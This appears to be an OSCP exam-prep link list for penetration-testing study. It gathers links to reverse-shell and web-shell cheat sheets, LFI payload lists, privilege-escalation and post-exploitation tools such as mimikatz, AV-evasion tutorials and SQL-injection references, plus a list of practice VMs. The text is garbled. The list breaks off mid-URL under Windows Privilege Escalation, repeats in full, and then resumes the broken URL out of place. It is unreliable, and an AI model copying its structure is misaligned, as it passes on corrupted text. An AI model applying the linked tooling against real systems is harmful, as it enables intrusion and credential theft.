Backdoors/Web Shells
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://highon.coffee/blog/reverse-shell-cheat-sheet/
- http://pentestmonkey.net/tools/web-shells/php-reverse-shell
- http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
- https://github.com/bartblaze/PHP-backdoors
- https://github.com/BlackArch/webshells
- https://github.com/tennc/webshell/tree/master/php/b374k
- https://github.com/tennc/webshell/tree/master/php/PHPshell/c99shell
- http://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
- http://securityweekly.com/2011/10/23/python-one-line-shell-code/
Buffer Overflows
- http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/
- http://proactivedefender.blogspot.ca/2013/05/understanding-buffer-overflows.html
- http://justpentest.blogspot.ca/2015/07/minishare1.4.1-bufferoverflow.html
- https://samsclass.info/127/proj/vuln-server.htm
- http://www.bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
Information Gathering/Reconnaissance
Cross-Compilation
Local File Inclusion/Remote File Inclusion (LFI/RFI)
- http://www.grobinson.me/single-line-php-script-to-gain-shell/
- https://webshell.co/
- https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
- https://osandamalith.com/2015/03/29/lfi-freak/
- https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29
- https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/
- https://attackerkb.com/Windows/blind_files
- https://digi.ninja/blog/when_all_you_can_do_is_read.php
- https://updatedlinux.wordpress.com/2011/05/12/list-of-important-files-and-directories-in-linux-redhatcentosfedora/
- https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
- https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI_InterestingFiles-NullByteAdded.txt
- http://www.r00tsec.com/2014/04/useful-list-file-for-local-file.html
- https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/
- https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt
File Transfer
- https://insekurity.wordpress.com/2012/05/15/file-transfer/
- https://www.cheatography.com/fred/cheat-sheets/file-transfers/
- https://blog.ropnop.com/transferring-files-from-kali-to-windows/
- https://linux.die.net/man/1/scp
- https://www.freebsd.org/cgi/man.cgi?fetch(1)
- https://curl.haxx.se/docs/manpage.html
- https://linux.die.net/man/1/wget
**SCP, WGET, FTP, TFTP, CURL, NC, FETCH
Fuzzing Payloads
General Notes
- https://bitvijays.github.io/LFC-VulnerableMachines.html
- http://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation /
- http://www.studfiles.ru/preview/2083097/page:7/
- http://126kr.com/article/3vbt0k8fxwh
- http://meyerweb.com/eric/tools/dencoder/
- https://www.darkoperator.com/powershellbasics
- https://wooly6bear.files.wordpress.com/2016/01/bwapp-tutorial.pdf
- http://alexflor.es/security-blog/post/egress-ports/
- https://www.exploit-db.com/papers/13017/
- https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
- http://explainshell.com/
- https://pentestlab.blog/2012/11/29/bypassing-file-upload-restrictions/
- https://github.com/g0tmi1k/mpc
- https://www.reddit.com/r/netsecstudents/comments/5fwc1z/failed_the_oscp_any_tips_for_the_next_attempt/danovo5/
- https://security.stackexchange.com/questions/110673/how-to-find-windows-version-from-the-file-on-a-remote-system
- https://www.veil-framework.com/veil-tutorial/ (AV Evasion)
- https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html
- https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
Ignore SSL in python scripts :http://stackoverflow.com/questions/19268548/python-ignore-certicate-validation-urllib2
Jailed Shell Escape
- http://netsec.ws/?p=337
- https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
- https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells
- http://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html
- http://securebean.blogspot.ca/2014/05/escaping-restricted-shell_3.html
Linux Post-Exploitation
- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
- https://github.com/huntergregal/mimipenguin
- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
Linux Privilege Escalation
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://www.kernel-exploits.com/
- https://github.com/rebootuser/LinEnum
- https://github.com/PenturaLabs/Linux_Exploit_Suggester
- https://www.securitysift.com/download/linuxprivchecker.py
- http://pentestmonkey.net/tools/audit/unix-privesc-check
- https://github.com/mzet-/linux-exploit-suggester
- http://www.darknet.org.uk/2015/06/unix-privesc-check-unixlinux-user-privilege-escalation-scanner/
- https://www.youtube.com/watch?v=dk2wsyFiosg
- http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/#gref
- https://www.rebootuser.com/?p=1758
Metasploit
- https://www.offensive-security.com/metasploit-unleashed/
- http://www.securitytube.net/groups?operation=view&groupId=8
MSFVenom Payloads
- http://netsec.ws/?p=331
- https://www.offensive-security.com/metasploit-unleashed/msfvenom/
- http://www.blackhillsinfosec.com/?p=4935
Port Scanning
- https://highon.coffee/blog/nmap-cheat-sheet/
- https://nmap.org/nsedoc/
- https://github.com/superkojiman/onetwopunch
- http://kalilinuxtutorials.com/unicornscan/
Password Cracking
- https://uwnthesis.wordpress.com/2013/08/07/kali-how-to-crack-passwords-using-hashcat/
- https://hashkiller.co.uk/
- https://linuxconfig.org/password-cracking-with-john-the-ripper-on-linux
- http://www.rarpasswordcracker.com/
Pivoting
- https://www.offensive-security.com/metasploit-unleashed/portfwd/
- https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
- https://github.com/rofl0r/proxychains-ng
- https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117
- https://pentest.blog/explore-hidden-networks-with-double-pivoting/
- https://blog.techorganic.com/2012/10/10/introduction-to-pivoting-part-2-proxychains/
- https://www.cobaltstrike.com/help-socks-proxy-pivoting
- https://sathisharthars.com/2014/07/07/evade-windows-firewall-by-ssh-tunneling-using-metasploit/
- https://artkond.com/2017/03/23/pivoting-guide/
Remote Desktop Protocol (RDP)
- https://serverfault.com/questions/148731/enabling-remote-desktop-with-command-prompt
- https://serverfault.com/questions/200417/ideal-settings-for-rdesktop
Samba (SMB)
- https://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
- http://www.blackhillsinfosec.com/?p=4645
TTY Shell Spawning
- http://netsec.ws/?p=337
- https://github.com/infodox/python-pty-shells
- https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
SQL Injection
- http://www.sqlinjection.net/category/attacks/
- http://sechow.com/bricks/docs/login-1.html
- https://www.exploit-db.com/papers/12975/
- https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
- https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
- https://github.com/cr0hn/nosqlinjection_wordlists
- https://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
- https://websec.ca/kb/sql_injection#MSSQL_Default_Databases
Vulnhub VMs
A few Vulnhub VMs. I recommend trying out a few before the exam or when your lab time expires.
Another good advice is to read/watch the walkthroughs of those machines. Try to root them yourself first!
- Kioptrix: Level 1 (#1)
- Kioptrix: Level 1.1 (#2)
- Kioptrix: Level 1.2 (#3)
- Kioptrix: Level 1.3 (#4)
- FristiLeaks: 1.3
- Stapler: 1
- PwnLab: init
- Tr0ll: 1
- Tr0ll: 2
- Kioptrix: 2014
- Lord Of The Root: 1.0.1
- Stapler: 1
- Mr-Robot: 1
- HackLAB: Vulnix
- VulnOS: 2
- SickOs: 1.2
- pWnOS: 2.0
HackTheBox (HTB)
HTBis a penetration testing platform with many machines that feel like they belong in the OSCP labs. All you have to do is pass the registration challenge and only then, you will have your VPN access provided. I suggest doing a few as it is free and an excellent way to prepare for the exam without downloading a vulnerable VM.
Web Exploitation
- http://www.studfiles.ru/preview/2083097/page:7/
- http://126kr.com/article/3vbt0k8fxwh
- http://meyerweb.com/eric/tools/dencoder/
Windows Post-Exploitation
- https://github.com/gentilkiwi/mimikatz/releases/
- https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa
- http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
- https://github.com/PowerShellMafia/PowerSploit
- https://github.com/gentilkiwi/mimikatz/releases
- http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
- https://github.com/mubix/post-exploitation/wiki/windows
Windows Privilege Escalation
http://wwBackdoors/Web Shells
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://highon.coffee/blog/reverse-shell-cheat-sheet/
- http://pentestmonkey.net/tools/web-shells/php-reverse-shell
- http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
- https://github.com/bartblaze/PHP-backdoors
- https://github.com/BlackArch/webshells
- https://github.com/tennc/webshell/tree/master/php/b374k
- https://github.com/tennc/webshell/tree/master/php/PHPshell/c99shell
- http://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
- http://securityweekly.com/2011/10/23/python-one-line-shell-code/
Buffer Overflows
- http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/
- http://proactivedefender.blogspot.ca/2013/05/understanding-buffer-overflows.html
- http://justpentest.blogspot.ca/2015/07/minishare1.4.1-bufferoverflow.html
- https://samsclass.info/127/proj/vuln-server.htm
- http://www.bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
Information Gathering/Reconnaissance
Cross-Compilation
Local File Inclusion/Remote File Inclusion (LFI/RFI)
- http://www.grobinson.me/single-line-php-script-to-gain-shell/
- https://webshell.co/
- https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
- https://osandamalith.com/2015/03/29/lfi-freak/
- https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29
- https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/
- https://attackerkb.com/Windows/blind_files
- https://digi.ninja/blog/when_all_you_can_do_is_read.php
- https://updatedlinux.wordpress.com/2011/05/12/list-of-important-files-and-directories-in-linux-redhatcentosfedora/
- https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
- https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI_InterestingFiles-NullByteAdded.txt
- http://www.r00tsec.com/2014/04/useful-list-file-for-local-file.html
- https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/
- https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt
File Transfer
- https://insekurity.wordpress.com/2012/05/15/file-transfer/
- https://www.cheatography.com/fred/cheat-sheets/file-transfers/
- https://blog.ropnop.com/transferring-files-from-kali-to-windows/
- https://linux.die.net/man/1/scp
- https://www.freebsd.org/cgi/man.cgi?fetch(1)
- https://curl.haxx.se/docs/manpage.html
- https://linux.die.net/man/1/wget
**SCP, WGET, FTP, TFTP, CURL, NC, FETCH
Fuzzing Payloads
General Notes
- https://bitvijays.github.io/LFC-VulnerableMachines.html
- http://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation /
- http://www.studfiles.ru/preview/2083097/page:7/
- http://126kr.com/article/3vbt0k8fxwh
- http://meyerweb.com/eric/tools/dencoder/
- https://www.darkoperator.com/powershellbasics
- https://wooly6bear.files.wordpress.com/2016/01/bwapp-tutorial.pdf
- http://alexflor.es/security-blog/post/egress-ports/
- https://www.exploit-db.com/papers/13017/
- https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
- http://explainshell.com/
- https://pentestlab.blog/2012/11/29/bypassing-file-upload-restrictions/
- https://github.com/g0tmi1k/mpc
- https://www.reddit.com/r/netsecstudents/comments/5fwc1z/failed_the_oscp_any_tips_for_the_next_attempt/danovo5/
- https://security.stackexchange.com/questions/110673/how-to-find-windows-version-from-the-file-on-a-remote-system
- https://www.veil-framework.com/veil-tutorial/ (AV Evasion)
- https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html
- https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
Ignore SSL in python scripts :http://stackoverflow.com/questions/19268548/python-ignore-certicate-validation-urllib2
Jailed Shell Escape
- http://netsec.ws/?p=337
- https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
- https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells
- http://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html
- http://securebean.blogspot.ca/2014/05/escaping-restricted-shell_3.html
Linux Post-Exploitation
- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
- https://github.com/huntergregal/mimipenguin
- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
Linux Privilege Escalation
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://www.kernel-exploits.com/
- https://github.com/rebootuser/LinEnum
- https://github.com/PenturaLabs/Linux_Exploit_Suggester
- https://www.securitysift.com/download/linuxprivchecker.py
- http://pentestmonkey.net/tools/audit/unix-privesc-check
- https://github.com/mzet-/linux-exploit-suggester
- http://www.darknet.org.uk/2015/06/unix-privesc-check-unixlinux-user-privilege-escalation-scanner/
- https://www.youtube.com/watch?v=dk2wsyFiosg
- http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/#gref
- https://www.rebootuser.com/?p=1758
Metasploit
- https://www.offensive-security.com/metasploit-unleashed/
- http://www.securitytube.net/groups?operation=view&groupId=8
MSFVenom Payloads
- http://netsec.ws/?p=331
- https://www.offensive-security.com/metasploit-unleashed/msfvenom/
- http://www.blackhillsinfosec.com/?p=4935
Port Scanning
- https://highon.coffee/blog/nmap-cheat-sheet/
- https://nmap.org/nsedoc/
- https://github.com/superkojiman/onetwopunch
- http://kalilinuxtutorials.com/unicornscan/
Password Cracking
- https://uwnthesis.wordpress.com/2013/08/07/kali-how-to-crack-passwords-using-hashcat/
- https://hashkiller.co.uk/
- https://linuxconfig.org/password-cracking-with-john-the-ripper-on-linux
- http://www.rarpasswordcracker.com/
Pivoting
- https://www.offensive-security.com/metasploit-unleashed/portfwd/
- https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
- https://github.com/rofl0r/proxychains-ng
- https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117
- https://pentest.blog/explore-hidden-networks-with-double-pivoting/
- https://blog.techorganic.com/2012/10/10/introduction-to-pivoting-part-2-proxychains/
- https://www.cobaltstrike.com/help-socks-proxy-pivoting
- https://sathisharthars.com/2014/07/07/evade-windows-firewall-by-ssh-tunneling-using-metasploit/
- https://artkond.com/2017/03/23/pivoting-guide/
Remote Desktop Protocol (RDP)
- https://serverfault.com/questions/148731/enabling-remote-desktop-with-command-prompt
- https://serverfault.com/questions/200417/ideal-settings-for-rdesktop
Samba (SMB)
- https://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
- http://www.blackhillsinfosec.com/?p=4645
TTY Shell Spawning
- http://netsec.ws/?p=337
- https://github.com/infodox/python-pty-shells
- https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
SQL Injection
- http://www.sqlinjection.net/category/attacks/
- http://sechow.com/bricks/docs/login-1.html
- https://www.exploit-db.com/papers/12975/
- https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
- https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
- https://github.com/cr0hn/nosqlinjection_wordlists
- https://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
- https://websec.ca/kb/sql_injection#MSSQL_Default_Databases
Vulnhub VMs
A few Vulnhub VMs. I recommend trying out a few before the exam or when your lab time expires.
Another good advice is to read/watch the walkthroughs of those machines. Try to root them yourself first!
- Kioptrix: Level 1 (#1)
- Kioptrix: Level 1.1 (#2)
- Kioptrix: Level 1.2 (#3)
- Kioptrix: Level 1.3 (#4)
- FristiLeaks: 1.3
- Stapler: 1
- PwnLab: init
- Tr0ll: 1
- Tr0ll: 2
- Kioptrix: 2014
- Lord Of The Root: 1.0.1
- Stapler: 1
- Mr-Robot: 1
- HackLAB: Vulnix
- VulnOS: 2
- SickOs: 1.2
- pWnOS: 2.0
HackTheBox (HTB)
HTBis a penetration testing platform with many machines that feel like they belong in the OSCP labs. All you have to do is pass the registration challenge and only then, you will have your VPN access provided. I suggest doing a few as it is free and an excellent way to prepare for the exam without downloading a vulnerable VM.
Web Exploitation
- http://www.studfiles.ru/preview/2083097/page:7/
- http://126kr.com/article/3vbt0k8fxwh
- http://meyerweb.com/eric/tools/dencoder/
Windows Post-Exploitation
- https://github.com/gentilkiwi/mimikatz/releases/
- https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa
- http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
- https://github.com/PowerShellMafia/PowerSploit
- https://github.com/gentilkiwi/mimikatz/releases
- http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
- https://github.com/mubix/post-exploitation/wiki/windows
Windows Privilege Escalation
- http://www.fuzzysecurity.com/tutorials/16.html
- https://toshellandback.com/2015/11/24/ms-priv-esc/
- https://github.com/pentestmonkey/windows-privesc-check
- https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- https://github.com/foxglovesec/RottenPotato
- http://www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet/
- https://www.youtube.com/watch?v=PC_iMqiuIRQ
- https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be
- https://github.com/PowerShellMafia/PowerSploit
- http://www.blackhillsinfosec.com/?p=5824
- https://www.commonexploits.com/unquoted-service-paths/
- https://github.com/abatchy17/WindowsExploits
w.fuzzysecurity.com/tutorials/16.html
- https://toshellandback.com/2015/11/24/ms-priv-esc/
- https://github.com/pentestmonkey/windows-privesc-check
- https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- https://github.com/foxglovesec/RottenPotato
- http://www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet/
- https://www.youtube.com/watch?v=PC_iMqiuIRQ
- https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be
- https://github.com/PowerShellMafia/PowerSploit
- http://www.blackhillsinfosec.com/?p=5824
- https://www.commonexploits.com/unquoted-service-paths/
- https://github.com/abatchy17/WindowsExploits